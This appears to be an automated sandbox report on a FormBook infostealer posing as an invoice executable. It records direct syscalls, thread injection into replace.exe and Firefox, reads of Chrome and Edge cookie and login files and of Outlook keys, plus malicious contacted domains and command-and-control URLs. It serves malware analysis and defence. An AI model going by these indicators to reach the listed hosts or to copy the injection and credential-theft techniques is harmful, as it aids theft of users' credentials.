Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\replace.exe Thread register set: target process: 2088 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\replace.exe Thread APC queued: target process: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe" Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Queries volume information: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427199 Sample: HYCO_Invoices MS2 & MS3.exe Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 29 www.www60270.xyz 2->29 31 www.skibinscy-finanse.pl 2->31 33 6 other IPs or domains 2->33 43 Snort IDS alert for network traffic 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 51 6 other signatures 2->51 10 HYCO_Invoices MS2 & MS3.exe 3 2->10         started        signatures3 49 Performs DNS queries to domains with low reputation 29->49 process4 process5 12 HYCO_Invoices MS2 & MS3.exe 10->12         started        15 HYCO_Invoices MS2 & MS3.exe 10->15         started        signatures6 63 Maps a DLL or memory area into another process 12->63 17 JlRhrxMCYjuGzWWvXkXNzhLX.exe 12->17 injected process7 signatures8 41 Found direct / indirect Syscall (likely to bypass EDR) 17->41 20 replace.exe 13 17->20         started        process9 signatures10 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 2 other signatures 20->59 23 JlRhrxMCYjuGzWWvXkXNzhLX.exe 20->23 injected 27 firefox.exe 20->27         started        process11 dnsIp12 35 www.skibinscy-finanse.pl 178.211.137.59, 49756, 49757, 49758 TIS-DIALOG-ASRU Ukraine 23->35 37 www.choosejungmann.com 91.195.240.117, 49740, 49741, 49742 SEDO-ASDE Germany 23->37 39 4 other IPs or domains 23->39 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.240.117
 www.avoshield.com Germany
47846 SEDO-ASDE true
79.98.25.1
 www.maxiwalls.com Lithuania
62282 RACKRAYUABRakrejusLT true
217.76.128.34
 www.colchondealquiler.com Spain
8560 ONEANDONE-ASBrauerstrasse48DE true
178.211.137.59
 www.skibinscy-finanse.pl Ukraine
31214 TIS-DIALOG-ASRU true
64.190.62.22
 www.paydayloans3.shop United States
11696 NBS11696US true
52.175.38.24
 fix01.pfw.djamxtvyk.cloudland3.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Contacted Domains

Name IP Active
www.maxiwalls.com 79.98.25.1 true
www.skibinscy-finanse.pl 178.211.137.59 true
www.avoshield.com 91.195.240.117 true
www.choosejungmann.com 91.195.240.117 true
www.paydayloans3.shop 64.190.62.22 true
fix01.pfw.djamxtvyk.cloudland3.com 52.175.38.24 true
www.colchondealquiler.com 217.76.128.34 true
www.www60270.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.avoshield.com/aleu/ true
    		unknown
    http://www.skibinscy-finanse.pl/aleu/ true
      		unknown
      http://www.choosejungmann.com/aleu/ true
        		unknown
        http://www.choosejungmann.com/aleu/?QbZ=7syVtg0wm45Xa+0QzpeywUsAZ6yAPvjdu6gzDOasV7nOCe5fUnUhGq++vYwq6UnaX+M1S/9yW1y2BV80NTALyVFlDkUwTwEaqx89+DAXSUPaXuqsOTbI6d4=&PL=0TtPMJQHYL true
          		unknown
          http://www.skibinscy-finanse.pl/aleu/?QbZ=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&PL=0TtPMJQHYL true
            		unknown
            http://www.paydayloans3.shop/aleu/ true
              		unknown
              http://www.colchondealquiler.com/aleu/ true
                		unknown
                http://www.colchondealquiler.com/aleu/?QbZ=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&PL=0TtPMJQHYL true
                  		unknown
                  http://www.paydayloans3.shop/aleu/?QbZ=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&PL=0TtPMJQHYL true
                    		unknown